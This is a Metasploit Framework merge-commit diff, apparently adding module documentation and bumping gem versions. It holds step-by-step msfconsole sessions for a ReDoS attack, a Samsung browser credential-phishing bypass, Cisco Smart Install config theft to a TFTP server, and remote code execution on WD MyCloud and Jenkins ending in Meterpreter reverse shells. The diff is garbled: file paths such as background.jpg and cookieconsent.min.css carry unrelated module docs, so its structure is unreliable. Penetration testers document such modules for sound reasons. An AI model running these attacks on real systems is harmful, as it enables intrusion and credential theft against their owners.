Merge branch 'upstream-master' into land-9296-

Author: busterb

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.23)
+    metasploit-framework (4.16.25)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -17,9 +17,9 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.19)
+      metasploit-payloads (= 1.3.20)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.2.8)
+      metasploit_payloads-mettle (= 0.3.2)
       msgpack
       nessus_rest
       net-ssh
@@ -37,7 +37,6 @@ PATH
       railties
       rb-readline
       rbnacl (< 5.0.0)
-      rbnacl-libsodium
       recog
       redcarpet
       rex-arch
@@ -138,7 +137,7 @@ GEM
       multi_json (~> 1.11)
       os (~> 0.9)
       signet (~> 0.7)
-    grpc (1.7.3)
+    grpc (1.8.0)
       google-protobuf (~> 3.1)
       googleapis-common-protos-types (~> 1.0.0)
       googleauth (>= 0.5.1, < 0.7)
@@ -178,7 +177,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.19)
+    metasploit-payloads (1.3.20)
     metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -189,7 +188,7 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.2.8)
+    metasploit_payloads-mettle (0.3.2)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
     minitest (5.10.3)
@@ -232,8 +231,8 @@ GEM
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
       activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.8)
-      activesupport (>= 4.2.0.beta, < 5.0)
+    rails-dom-testing (1.0.9)
+      activesupport (>= 4.2.0, < 5.0)
       nokogiri (~> 1.6)
       rails-deprecated_sanitizer (>= 1.0.1)
     rails-html-sanitizer (1.0.3)
@@ -247,8 +246,6 @@ GEM
     rb-readline (0.5.5)
     rbnacl (4.0.2)
       ffi
-    rbnacl-libsodium (1.0.15.1)
-      rbnacl (>= 3.0.1)
     recog (2.1.17)
       nokogiri
     redcarpet (3.4.0)

data/exploits/pfsense_clickjacking/background.jpg

@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This auxiliary module exploits a Regular Expression Denial of Service vulnerability
+in the npm module `ua-parser-js`.  Versions before 0.7.16 are vulnerable.  
+Any application that uses a vulnerable version of this module and calls the `getOS`
+or `getResult` functions will be vulnerable to this module.  An example server is provided
+below.
+
+## How to Install
+
+To install a vulnerable version of `ua-parser-js`, run:
+```
+npm i [email protected]
+```
+
+## Verification Steps
+
+Example steps in this format (is also in the PR):
+
+1. Create a new directory for test application.
+2. Copy below example server into test application directory as `server.js`.
+3. Run `npm i express` to install express in the test application directory.
+4. To test vulnerable versions of the module, run `npm i [email protected]` to install a vulnerable version of ua-parser-js.
+5. To test non-vulnerable versions of the module, run `npm i ua-parser-js` to install the latest version of ua-parser-js.
+6. Once all dependencies are installed, run the server with `node server.js`.
+7. Open up a new terminal.
+8. Start msfconsole.
+9. `use auxiliary/dos/http/ua_parser_js_redos`.
+10. `set RHOST [IP]`.
+11. `run`.
+12. In vulnerable installations, Module should have positive output and the test application should accept no further requests.
+13. In non-vulnerable installations, module should have negative output and the test application should accept further requests.
+
+## Scenarios
+
+### ua-parser-js npm module version 0.7.15
+
+Expected output for successful exploitation:
+
+```
+[*] Testing Service to make sure it is working.
+[*] Test request successful, attempting to send payload
+[*] Sending ReDoS request to 192.168.3.24:3000.
+[*] No response received from 192.168.3.24:3000, service is most likely unresponsive.
+[*] Testing for service unresponsiveness.
+[+] Service not responding.
+[*] Auxiliary module execution completed
+```
+
+### Example Vulnerable Application
+
+```
+// npm i express
+// npm i [email protected] (vulnerable)
+// npm i ua-parser-js (non-vulnerable)
+
+const express = require('express')
+const uaParser = require('ua-parser-js');
+const app = express()
+
+app.get('/', (req, res) => {
+  var parser = new uaParser(req.headers['user-agent']);
+  res.end(JSON.stringify(parser.getResult()));
+});
+
+app.listen(3000, '0.0.0.0', () => console.log('Example app listening on port 3000!'))
+```

data/exploits/pfsense_clickjacking/cookieconsent.min.css

@@ -0,0 +1,56 @@
+## Description
+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
+## Vulnerable Application
+This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
+
+## Verification Steps
+1. Start `msfconsole -q`
+2. `use auxiliary/gather/samsung_browser_sop_bypass`
+3. `set SRVHOST`
+4. `set SRVPORT`
+5. `set URIPATH`
+6. `set TARGET_URL`
+5. `run`
+
+## Scenarios
+```
+$ sudo msfconsole -q
+msf > use auxiliary/gather/samsung_browser_sop_bypass
+msf auxiliary(samsung_browser_sop_bypass) > set SRVHOST 192.168.1.104
+SRVHOST => 192.168.1.104
+msf auxiliary(samsung_browser_sop_bypass) > set SRVPORT 9090
+SRVPORT => 9090
+msf auxiliary(samsung_browser_sop_bypass) > set URIPATH /
+URIPATH => /
+msf auxiliary(samsung_browser_sop_bypass) > set TARGET_URL https://www.google.com/csi
+TARGET_URL => https://www.google.com/csi
+msf auxiliary(samsung_browser_sop_bypass) > run
+[*] Auxiliary module execution completed
+msf auxiliary(samsung_browser_sop_bypass) >
+[*] Using URL: http://192.168.1.104:9090/
+[*] Server started.
+[*] 192.168.1.101: Request 'GET /'
+[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
+[*] 192.168.1.101: Request 'GET /favicon.ico'
+[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
+[*] 192.168.1.101: Request 'GET /favicon.ico'
+[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
+[+] 192.168.1.101: Collected credential for 'https://www.google.com/csi' emailID:MyStrongPassword
+
+msf auxiliary(samsung_browser_sop_bypass) > creds
+Credentials
+===========
+
+host            origin          service          public          private                                                            realm                       private_type
+----            ------          -------          ------          -------                                                            -----                       ------------
+                                                 emailID         MyStrongPassword                                                   https://www.google.com/csi  Password
+
+msf auxiliary(samsung_browser_sop_bypass) >
+```
+
+## Demos
+
+Working of MSF Module: `https://youtu.be/ulU98cWVhoI`
+
+Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`

data/exploits/pfsense_clickjacking/cookieconsent.min.js

@@ -5,13 +5,28 @@
 ## Verification Steps
 
   1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
-  2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
+  2. Do: ```set ACTION SCAN```
+  3. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
   3. Do: ```run```
   4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
 
+## Options
+
+### SLEEP
+Time to wait for connection back from target. Default is `60` seconds if using `DOWNLOAD` action
+
+### LHOST
+Address to bind to for TFTP server to accept connections if using `DOWNLOAD` action
+
+## Actions
+There are two actions, default being ```SCAN```
+
+  1. **SCAN** - Scan for Smart Install endpoints. [Default]
+  2. **DOWNLOAD** - Request devices configuration and send to our TFTP server
 
 ## Scenarios
 
+Using the default `SCAN` action
   ```
 msf auxiliary(cisco_smart_install) > run
 
@@ -28,3 +43,19 @@ msf auxiliary(cisco_smart_install) > run
 [*] Scanned 512 of 512 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
+
+Using the `DOWNLOAD` action
+
+  ```
+[*] 192.168.0.26:4786      - Starting TFTP Server...
+[+] 192.168.0.26:4786      - Fingerprinted the Cisco Smart Install protocol
+[*] 192.168.0.26:4786      - Attempting copy system:running-config tftp://192.168.0.11/kWqjngYF
+[*] 192.168.0.26:4786      - Waiting 60 seconds for configuration
+[*] 192.168.0.26:4786      - Incoming file from 192.168.0.26 - kWqjngYF (31036 bytes)
+[+] 192.168.0.26:4786      - 192.168.0.26:4786 Decrypted Enable Password: testcase
+[+] 192.168.0.26:4786      - 192.168.0.26:4786 Username 'admin' with Decrypted Password: testcase)
+[*] 192.168.0.26:4786      - Providing some time for transfers to complete...
+[*] 192.168.0.26:4786      - Shutting down the TFTP service...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/dos/http/ua_parser_js_redos.md

@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  [Web Services Dynamic Discovery (WS-Discovery)](https://en.wikipedia.org/wiki/WS-Discovery) is a multicast discovery protocol utilising SOAP over UDP to locate web services on a local network.
+
+  Web service enabled devices typically include printers, scanners and file shares.
+
+  The reply from some devices may include optional vendor extensions. This data may include network information such as the device MAC address and hostname, or hardware information such as the serial number, make, and model.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/scanner/wsdd/wsdd_query`
+  3. Do: `set RHOSTS [IP]` (Default: `239.255.255.250`)
+  4. Do: `run`
+
+
+## Scenarios
+
+  ```
+  msf > use auxiliary/scanner/wsdd/wsdd_query 
+  msf auxiliary(wsdd_query) > set rhosts 239.255.255.250
+  rhosts => 239.255.255.250
+  msf auxiliary(wsdd_query) > run
+
+  [*] Sending WS-Discovery probe to 1 hosts
+  [+] 10.1.1.184 responded with:
+  Address: http://10.1.1.184:3911/ 
+  Types: wsdp:Device, wprt:PrintDeviceType, wscn:ScanDeviceType, hpd:hpDevice
+  Vendor Extensions: {"HardwareAddress"=>"123456789ABC", "UUID"=>"12345678-1234-1234-abcd-123456789abc", "IPv4Address"=>"10.1.1.123", "Hostname"=>"HP09AAFB", "DeviceId"=>"MFG:HP;MDL:Photosmart 5520 series;DES:CX042A;", "DeviceIdentification"=>{"MakeAndModel"=>"Photosmart 5520 series", "MakeAndModelBase"=>"Photosmart 5520 series"}, "SerialNumber"=>"123456", "Services"=>" Print9100 SclScan RESTScan CIFS DOT4 LEDM", "AdapterType"=>"WifiEmbedded"}
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+

documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md

@@ -0,0 +1,40 @@
+## Description
+
+This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.
+
+## Vulnerable Application
+	
+  [Western Digital](https://www.wdc.com/) designs drives and network attached storage (NAS) devices for both consumers and businesses.
+
+  This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172 .
+
+## Verification Steps
+
+1. Do: ```use exploit/linux/http/wd_mycloud_multiupload_upload```
+2. Do: ```set RHOST [IP]```
+3. Do: ```check```
+4. It should be reported as vulnerable
+5. Do: ```run```
+6. You should get a shell
+
+## Scenarios
+
+```
+msf > use exploit/linux/http/wd_mycloud_multiupload_upload
+msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
+RHOST => 192.168.86.104
+msf exploit(wd_mycloud_multiupload_upload) > check
+[+] 192.168.86.104:80 The target is vulnerable.
+msf exploit(wd_mycloud_multiupload_upload) > run
+
+[*] Started reverse TCP handler on 192.168.86.215:4444 
+[*] Uploading PHP payload (1124 bytes) to '/var/www'.
+[+] Uploaded PHP payload successfully.
+[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
+[*] Sending stage (37543 bytes) to 192.168.86.104
+[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
+[+] Deleted .7bc5NqFMK5.php
+
+meterpreter > getuid
+Server username: root (0)
+```

documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md

@@ -0,0 +1,62 @@
+Jenkins XStream Groovy classpath Deserialization Vulnerability (CVE-2016-0792)
+
+This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution. The issue affects default installations. Authentication is not required to exploit the vulnerability.
+
+## Vulnerable Application
+
+Jenkins versions < 1.650 and Jenkins LTS versions < 1.642.2
+
+Download Jenkins (Windows) < version 1.650 from here:
+http://mirrors.jenkins-ci.org/windows/
+
+Windows Installation: Double click .msi
+
+Download Jenkins LTS (Debian) < version 1.642.2 from here:
+https://pkg.jenkins.io/debian-stable/
+
+Download Jenkins (Debian) < version 1.650 from here:
+https://pkg.jenkins.io/debian/
+
+Debian Installation: `sudo dpkg --install jenkins_1.642.1_all.deb`
+
+## Options
+
+**TARGETURI**
+
+The base path to Jenkins application `/` by default
+
+**VHOST**
+
+The HTTP server virtual host. You may need to configure this as well, even though it is set as optional.
+
+**The Check Command**
+
+The `jenkins_xstream_deserialize` module comes with a check command that can attempt to check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following:
+
+Note: The check only uses `appears to be vulnerable` because it is not possible to differentiate from HTTP headers which Jenkins line (Weekly or LTS) is running.
+
+```
+set RHOST [IP]
+
+set TARGETURI [path to Jenkins]
+```
+
+```
+msf exploit(jenkins_xstream_deserialize) > check
+
+[*] 192.168.1.64:8080 The target appears to be vulnerable..
+```
+
+**Exploiting the Host**
+
+After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS.
+
+```
+msf exploit(jenkins_xstream_deserialize) > set RHOST 192.168.1.37
+RHOST => 192.168.1.37
+msf exploit(jenkins_xstream_deserialize) > set target 3
+target => 3
+msf exploit(jenkins_xstream_deserialize) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf exploit(jenkins_xstream_deserialize) > exploit
+```